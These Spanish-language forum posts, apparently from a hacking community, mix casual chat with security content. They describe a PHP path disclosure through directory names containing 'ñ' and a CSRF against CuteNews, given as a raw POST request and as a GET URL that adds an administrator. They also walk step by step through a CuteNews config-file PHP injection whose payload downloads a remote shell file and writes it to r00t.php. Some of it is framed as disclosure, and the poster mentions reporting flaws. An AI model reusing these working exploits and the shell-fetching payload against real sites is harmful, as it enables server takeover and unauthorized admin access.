Mensajes

No será un auto retrato?

Esa era la idea xD

es impresionante WHK ... y luego me pides que te haga el logo???

Esque hacer cosas a mano no es lo mismo que diseñar en photoshop o paint shop pro porque no se manejar muy bién los efectos y esas cosas, además el diseño digital es mucho mejor que mis dibujos.

Una ves hize un userbar a mano de sitehacking pero ya se me perdió.

Que yo sepa no, busqué info en gogole y no encontré nada relacionado además si alguien mas lo hubiera dicho ya estarían en una versión de php que no tuviera ese bug

[Warning]

Estaba en mi servidor local y pude percatarme de un bug bién raro.
Enciende tu servidor local y haz un nuevo directorio con cualquier nombre que contenga la letra "ñ" y pon dentro un archivo php o html con cualquier contenido.
Si lo intentas visualizar verás que php lanza un error y da el path disclosure:

Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0

Fatal error: Unknown: Failed opening required 'C:/wamp/www/portal_foro/diseño/index.php' (include_path='.;C:\php5\pear') in Unknown on line 0

Nakp me ayudó y pudo verificar que esto también funciona en servidores Linux y con casi cualquier carácter especial como por ejemplo acentos.

Esto puede dificilmente pero posible transformarse en una vulnerabilidad como por ejemplo en el mod My_Uploads de phpnuke donde se crea un nuevo directorio dependiendo del nombre de usuario, claramente esto tiene un filtro de no incluir slashses y puntos pero estos filtros no consideran carácteres especiales haciendo el directorio lo mas fiél posible al nick del usuario pero sin contar que php no está preparado para eso lanzando este tipo de errores y mostrando la ruta total del directorio dando información a un posible atacante.

Ya lo avisé.

jaja nunca habia visto una web que te diera tanta información sobre las fallas que tienen xD por lo general los administradores esconden esa información pero este los muestra de plano xD, un poco mas y te da un zip con la web completa xD

Si puede ser una vulnerabilidad aunque habría que ver bién, de todas formas una web que está programada de esa forma no es de dudar que así sea.

Te recomiendo que para que la web de tu establecimiento no tenga problemas cambies la url por www.test.com y pongas acá la información que puedas y la gente puede ayudarte a ver si de alguna forma esa web es vulnerable.

Te recomiendo que si llegas a encontrar alguna falla comprometedora se lo digas al administrador y de seguro tendrá mas provecho que te feliciten o te consideren a que desbarates la web y te anden buscando después.

Nota: debido a las reglas no puedo permitir que expongas enlaces de sitios web extenos vulnerables a menos que sean de tu propiedad lo cual no es así. Espero que mañana puedas modificarlo o tendré que modificarlo yo.
Gracias.
http://foro.elhacker.net/leer_esto_es_de_vida_o_muerte-t254616.0.html

A mi, tenía muchos dibujos pero la mayoría que eran los mejores los regalé y en ese tiempo no tenía escaner

http://www.jccharry.com/portada/la-galeria/view/1.html

Lo agregué al recopilatorio de post
https://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_25509-t244090.0.html

Y de pasada hize un video:

[youtube=525,450]http://www.youtube.com/watch?v=6tM6UP9J_hE[/youtube]

Ahora mismo no traigo mi server de pruebas pero mañana intento hacer algo de SQL en las entradas a ver si encuentro algo ñ_ñ'

No usa SQL, solamente guarda todos los datos en archivos de texto.

Ya pude inyectar una shell y no está tan dificil, solamente que debes regirte por un filtro htmlspecialchars sin token o sea que puedes escribir comillas simples y con eso crear tu código php de la siguiente forma.

Fijate en configuraciones:
http://127.0.0.1/cutenews/index.php?mod=options&action=syscon&rand=xxx


Cuando guardas una configuración lo que haces es sobreescribir un archivo llamado data/config.php

Código (php) [Seleccionar] Expandir

<?PHP

//System Configurations (Auto Generated file)

$config_http_script_dir = "http://127.0.0.1/cutenews";

$config_skin = "default";

$config_date_adjust = "0";

...

El filtro dice así:
inc/options.mdu linea 755 a 760

Código (php) [Seleccionar] Expandir

   fwrite($handler, "<?PHP \n\n//System Configurations (Auto Generated file)\n\n");
   foreach($save_con as $name=>$value)
   {
           fwrite($handler, "\$config_$name = \"".htmlspecialchars($value)."\";\n\n");
   }
   fwrite($handler, "?>");

Como htmlspecialchars no tiene token ENT_QUOTES (http://cl.php.net/htmlspecialchars) significa que podemos insertar comillas simples pero si no podemos inyectar con comillas dobles para escapar de la variable $config_http_script_dir como lo hacemos?:



Fijate que en el input donde va el link del cutenews le puse al final el carácter "\" asi que tomará la comilla doble como parte de la misma variable y queda masomenos así:


Ahora que logramos escapar hay que cerrar la variable y comenzara a inyectar código:

; echo 'test'; exit; /*

Fijate que este contenido queda acá:

$config_skin = "default";

asi que nos encontramos con la comilla doble que cierra la primera variable y comenzamos a escribir en php pero primero cerramos con ";" y para que el código no quede corrupto y se quede sin hacer nada cerramos con "/*" y queda:




Ya sabemos que se ejecuta el código pero ojo que cuando lo hagas quedará corrupto pero las configuraciones por defecto de cutenews permiten que alcance a terminar de ejecutar nuestra inyeción asi que hay solo una oportunidad y si te fijas también no puedes ejecutar código y terminar con exit si es que no se debolvió algún buffer de stream en el php (debe ser por la misma configuración y ob_start() ) asi que en total nos queda masomenos así:

Código (php) [Seleccionar] Expandir

; echo 'stream'; $s = file_get_contents('http://www.web.com/shell.txt'); $f = fopen('r00t.php', 'x'); fwrite($f, $s); fclose($f); echo $s; exit; /*

Cuando lo hagas te va a dar el mismo error que la imagen anterior pero si vas a http://127.0.0.1/cutenews/r00t.php verás algo así como esto:

el foro de soporte debe tener cosas editadas. A menos que confien demasiado en su sistema

Si lo verifiqué, la versión que ellos usan tiene varias diferencias de seguridad en comparación a las versines públicas, por ejemplo antiguamente cuando se podia tener acceso a la lista de mods instalados simplemachines le tenia puesto un htaccess para denegar el acceso al directorio de paquetes pero ninguna versión publica la tenía y por eso se daba un disclosure.. dos versiones después se lo agregaron.

Eso de visualizar el máximo de usuarios ellos lo tienen configurado para que muestre un máximo de 75 usuarios pero en todas las versiones publicas te jodes y te manda al carajo el foro exausteando la memoria.

De todas formas SMF es uno de los sistemas de foro mas seguro.

no hay una manera "por default" de escalar privilegios en cutenews.. para encontrar alguna manera tendrias que revisar el codigo fuente por vulnerabilidades.

Yo decidí hace un tiempo revisar el código fuente de ese sistema y si tiene varias fallas, mas de 5 si no me falla mi memoria de elefante php.

No recuerdo cuales eran pero si pretendes explotar el que está en la sección de noticias ( http://www.elhacker.net/notis/ ) no podrás porque eliminaron casi todos los archivos donde podías infiltrarte.

Recuerdo si que tenía csrf por todos lados y podías crear y borrar usuarios y hacerlos admin.

Si no me equivoco los usuarios eran manejados en archivos de texto y no en bases de datos MySQL.

Mañana lo bajaré otraves para hecharle una rehojeada.

Edito -->

http://127.0.0.1/cutenews/index.php

POST /cutenews/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://127.0.0.1/cutenews/index.php?mod=editusers&action=list
Cookie: lastusername=whk; username=whk; md5_password=xxx;
Content-Type: application/x-www-form-urlencoded
Content-Length: 128
regusername=zkizzik&regpassword=_123456&regnickname=zkizzik&regemail=zkizzik%40gmail.com&reglevel=1&action=adduser&mod=editusers

Agregué un user de prueba como admin y no hay token ni referer de verificación, ahi ya tienes un csrf y puedes crear usuarios admin si es que pillas al admin original y haces que vea una web tuya donde se le redireccionará.

Si mi memoria de elefante php no me falla recuerdo que la primera ves que vi este sistema pude ver que las peticiones post podían procesarse como si fueran get al igual que cpanel asi que puedes causar un csrf desde una imagen en un foro, etc.

Edito2 -->
Si se puede:
http://127.0.0.1/cutenews/index.php?regusername=zkizzik&regpassword=_123456&regnickname=zkizzik&regemail=zkizzik%40gmail.com&reglevel=1&action=adduser&mod=editusers

User Added
   
The user zkizzik was successfully added as administrator

go back

Bueno ya se los reporté -->
http://www.simplemachines.org/community/index.php?topic=307717.msg2073213#msg2073213

Pero no me respondieron de buena forma -->
http://www.simplemachines.org/community/index.php?topic=307717.msg2073242#msg2073242

Creo que tenía bastante razón un amigo mio cuando dijo que los comentarios de fallas en smf no eran muy bién bienvenidas.

El soporte técnico dijo:

ok... rather than post a link to a spanish forum with a relatively useless comment, care to tell use what they claim the bug in 1.1.9 is?

post inutiles y donde está la falla, joder o no sabe español pero de ahi a que el post no sea relevante ps ayá ellos yo ya les avisé, yo no hablo ingles asi que no pude explicarles con detalles y ellos no saben español... no es mi culpa de nacer en chile y ellos en usa asi que que mas se le va a hacer, por lo menos cuando publiqué las fallas en joomla me respondieron en medio español jajaja.

Talves quieran un video demostrativo para que digan "aah era verdad" al igual que en joomla que después de varias semanas después publiqué el video e inmediatamente o reconsideraron.